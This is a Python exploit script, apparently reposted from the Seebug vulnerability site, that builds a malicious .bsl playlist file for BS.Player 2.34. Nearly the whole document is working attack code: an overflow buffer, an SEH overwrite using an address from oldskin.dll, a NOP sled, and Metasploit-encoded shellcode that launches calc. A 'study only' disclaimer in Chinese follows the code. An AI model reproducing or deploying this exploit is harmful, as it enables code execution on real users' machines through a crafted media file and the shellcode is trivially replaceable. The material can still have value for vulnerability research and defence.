#usage: exploit.py print \"**************************************************************************\" print \" Bs.Player 2.34 (.bsl) Universal Seh Overwrite Exploit\\n\" print \" Author : Nine:Situations:Group::pyrokinesis\" print \" Exploited by : His0k4\" print \" Tested on: Windows XP Pro SP2 Fr\\n\" print \" Greetings to:\" print \" All friends & muslims HaCkers(dz)\\n\" print \"**************************************************************************\" buff = \"\\x41\" * 412 next_seh = \"\\xEB\\x12\\x41\\x41\" seh = \"\\xD0\\x26\\x58\\x02\" # oldskin.dll nops = \"\\x90\"*19 header1= \"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x52\\x61\\x77\\x2D\\x48\\x69\\x67\\x68\\x2E\" header2= \"\\x2E\\x46\\x4D\\x2F\\x6C\\x69\\x73\\x74\\x65\\x6E\\x2E\\x70\\x6C\\x73\\x0A\\x00\" # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com shellcode = ( \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\" \"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\" \"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\" \"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\" \"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\" \"\\x42\\x50\\x42\\x30\\x42\\x30\\x4b\\x58\\x45\\x34\\x4e\\x33\\x4b\\x58\\x4e\\x37\" \"\\x45\\x30\\x4a\\x37\\x41\\x30\\x4f\\x4e\\x4b\\x48\\x4f\\x54\\x4a\\x51\\x4b\\x58\" \"\\x4f\\x55\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x34\\x4b\\x58\\x46\\x33\\x4b\\x48\" \"\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x58\\x42\\x4c\" \"\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e\" \"\\x46\\x4f\\x4b\\x33\\x46\\x55\\x46\\x52\\x46\\x50\\x45\\x37\\x45\\x4e\\x4b\\x58\" \"\\x4f\\x45\\x46\\x42\\x41\\x30\\x4b\\x4e\\x48\\x56\\x4b\\x38\\x4e\\x30\\x4b\\x34\" \"\\x4b\\x58\\x4f\\x35\\x4e\\x31\\x41\\x30\\x4b\\x4e\\x4b\\x38\\x4e\\x41\\x4b\\x58\" \"\\x41\\x50\\x4b\\x4e\\x49\\x48\\x4e\\x45\\x46\\x52\\x46\\x50\\x43\\x4c\\x41\\x53\" \"\\x42\\x4c\\x46\\x56\\x4b\\x58\\x42\\x54\\x42\\x53\\x45\\x48\\x42\\x4c\\x4a\\x57\" \"\\x4e\\x50\\x4b\\x58\\x42\\x54\\x4e\\x30\\x4b\\x38\\x42\\x57\\x4e\\x41\\x4d\\x4a\" \"\\x4b\\x38\\x4a\\x46\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x38\\x42\\x48\\x42\\x4b\" \"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x58\\x4a\\x46\\x4e\\x53\\x4f\\x35\\x41\\x33\" \"\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x57\" \"\\x42\\x35\\x4a\\x36\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x45\\x4a\\x46\\x4a\\x49\" \"\\x50\\x4f\\x4c\\x48\\x50\\x30\\x47\\x45\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x41\\x56\" \"\\x4e\\x46\\x43\\x46\\x42\\x30\\x5a\") exploit = header1 + buff + next_seh + seh + nops + shellcode + header2 try: out_file = open(\"exploit.bsl\",\'w\') out_file.write(exploit) out_file.close() print \"Exploit file created!\\n\" except: print \"Error\"
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京ICP备10040895号
暂无评论